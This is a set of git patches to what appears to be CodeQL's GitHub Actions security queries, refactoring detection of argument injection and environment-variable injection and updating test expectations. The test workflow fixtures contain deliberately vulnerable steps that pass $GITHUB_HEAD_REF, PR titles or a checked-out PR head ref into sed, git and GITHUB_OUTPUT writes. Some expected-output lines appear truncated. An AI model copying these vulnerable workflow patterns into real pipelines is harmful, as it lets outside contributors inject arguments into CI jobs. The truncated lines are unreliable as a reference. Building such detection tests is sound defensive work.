+9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. - * Where the command is a string captured from the Run's script. - */ -bindingset[var] -predicate envToArgInjSink(string var, Run run, string command) { - exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run.getScript(), var, argument) and - exists(run.getInScopeEnvVarExpr(var)) - ) -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -36,23 +19,16 @@ predicate envToArgInjSink(string var, Run run, string command) { */ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | - envToArgInjSink(var, run, command) and run.getScript() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var)) - ) - or - exists( - Run run, string cmd, string argument, string regexp, int argument_group, int command_group - | - run.getScript().getACommand() = cmd and - run.getScript() = this.asExpr() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + ( + exists(run.getInScopeEnvVarExpr(var)) or + var = "GITHUB_HEAD_REF" + ) and + run.getScript().getAnEnvReachingArgumentInjectionSink(var, command, argument) ) } @@ -68,18 +44,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { */ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromCommandSink() { - exists( - CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, - int command_group - | + exists(CommandSource source, Run run | run = source.getEnclosingRun() and this.asExpr() = run.getScript() and - cmd = run.getScript().getACommand() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) + run.getScript().getACmdReachingArgumentInjectionSink(source.getCommand(), command, argument) ) } @@ -103,14 +74,9 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource or - exists( - Run run, string argument, string cmd, string regexp, int command_group, int argument_group - | + exists(Run run | run.getScript() = source.asExpr() and - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + run.getScript().getAnEnvReachingArgumentInjectionSink("GITHUB_HEAD_REF", _, _) ) } @@ -120,7 +86,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and - envToArgInjSink(var, run, _) + run.getScript().getAnEnvReachingArgumentInjectionSink(var, _, _) ) } } diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index e78f152e60b..d5536ca1c74 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -22,15 +22,11 @@ | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< issue.txt << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat < | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | @@ -84,77 +80,77 @@ | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | } | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV < | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | } | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | } | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | } | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | @@ -171,7 +167,7 @@ | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 59ea1564bdd..42ba8bf2749 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -34,3 +34,15 @@ jobs: - run: | BODY=$(git log --format=%s) sed "s/FOO/$BODY/g" > /tmp/foo + + - name: Checkout ref + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Detect new changesets + id: added-files + run: | + delimiter="$(openssl rand -hex 8)" + echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}" + echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}" + echo "${delimiter}" >> "${GITHUB_OUTPUT}" diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 326cb935f7c..1e4051fef43 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -26,5 +26,4 @@ subpaths | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | From b49cd3b916e792221221c0215df29e448fa91019 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 08:48:32 +0200 Subject: [PATCH 0588/1267] Better handling of EnvVar Injection and Argument Injection --- ql/lib/codeql/actions/Bash.qll | 18 +++--- ql/lib/codeql/actions/config/Config.qll | 16 +---- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 57 ++++++++++++----- .../actions/security/PoisonableSteps.qll | 11 +--- .../security/UntrustedCheckoutQuery.qll | 8 +-- .../ext/config/argument_injection_sinks.yml | 15 +++-- ql/lib/ext/config/poisonable_steps.yml | 16 ++--- ql/lib/ext/config/untrusted_git_commands.yml | 26 ++++---- ql/test/library-tests/commands.expected | 36 +++++------ .../library-tests/poisonable_steps.expected | 1 - .../CWE-077/.github/workflows/test16.yml | 35 +++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 15 +++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 ++-- .../.github/workflows/arg_injection.yml | 62 +++++++++++++------ .../ArgumentInjectionCritical.expected | 54 +++++++++------- .../CWE-088/ArgumentInjectionMedium.expected | 33 +++++----- 17 files changed, 246 insertions(+), 172 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 12866a141a6..672f7727f5b 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -220,9 +220,13 @@ class BashShellScript extends ShellScript { override string getCommand(int i) { // remove redirection result = - this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and + this.getCmd(i) + .regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") + .trim() and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude comments + not result.trim().indexOf("#") = 0 and // exclude the following keywords not result = [ @@ -359,11 +363,11 @@ module Bash { exists(string regexp | // $(cmd) regexp = ".*\\$\\(([^)]+)\\).*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() or // `cmd` regexp = ".*`([^`]+)`.*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() ) } @@ -657,8 +661,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and envReachingRunExpr(script, source, argument) ) } @@ -669,8 +673,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and cmdReachingRunExpr(script, source, argument) ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index e3bf239565e..82b7a53a9d7 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -47,10 +47,6 @@ predicate externallyTriggerableEventsDataModel(string event) { private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } -private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } - -private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } - /** * MaD models for poisonable commands * Fields: @@ -59,9 +55,7 @@ private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and - // find regexp - regexp = - commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() + regexp = commandLauncher() + sub_regexp + ".*" ) } @@ -74,10 +68,7 @@ predicate poisonableCommandsDataModel(string regexp) { predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and - // capture regexp - regexp = - ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + - ".*" + regexp = commandLauncher() + sub_regexp + ".*" ) } @@ -91,8 +82,7 @@ predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" + regexp = commandLauncher() + sub_regexp ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b30fd5495ed..a9967a72ee6 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -100,10 +100,10 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { ) and this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getScript().getACommand() = cmd and + run.getScript().getAStmt() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex) + cmd.regexpMatch(".*" + cmd_regex + ".*") ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 214e97fed6b..13d6312b585 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -9,17 +9,17 @@ import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +string sanitizerCommand() { + result = + [ + "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' + "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 + ] +} + /** * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * cat test-results/.env >> $GITHUB_ENV - * - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - * - * FOO=$(cat test-results/sha-number) - * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { @@ -31,11 +31,19 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( - exists(string cmd | - run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and - run.getScript().getAFileReadCommand() = cmd + // eg: + // echo "SHA=$(cat test-results/sha-number)" >> $GITHUB_ENV + // echo "SHA=$(> $GITHUB_ENV + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string cmd, string var, string sanitizer | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, var) and + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) ) or + // eg: cat test-results/.env >> $GITHUB_ENV run.getScript().fileToGitHubEnv(_) ) ) @@ -51,9 +59,18 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { - exists(CommandSource source | + exists(CommandSource source, Run run, string var | this.asExpr() = source.getEnclosingRun().getScript() and - source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) + run = source.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } @@ -68,10 +85,18 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name | + exists(Run run, string var_name, string var | exists(run.getInScopeEnvVarExpr(var_name)) and run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 85932181aed..0cc8f913166 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -3,22 +3,15 @@ import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -private string dangerousActions() { - exists(string action | - poisonableActionsDataModel(action) and - result = action - ) -} - class DangerousActionUsesStep extends PoisonableStep, UsesStep { - DangerousActionUsesStep() { this.getCallee() = dangerousActions() } + DangerousActionUsesStep() { poisonableActionsDataModel(this.getCallee()) } } class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - this.getScript().getACommand().regexpMatch("^" + regexp + ".*") + this.getScript().getACommand().regexpMatch(regexp) ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index e9bf1edfe7d..c9a78f6d0b6 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -53,7 +53,7 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } @@ -99,7 +99,7 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } @@ -199,7 +199,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ( exists(ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name @@ -243,7 +243,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ( exists(ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name diff --git a/ql/lib/ext/config/argument_injection_sinks.yml 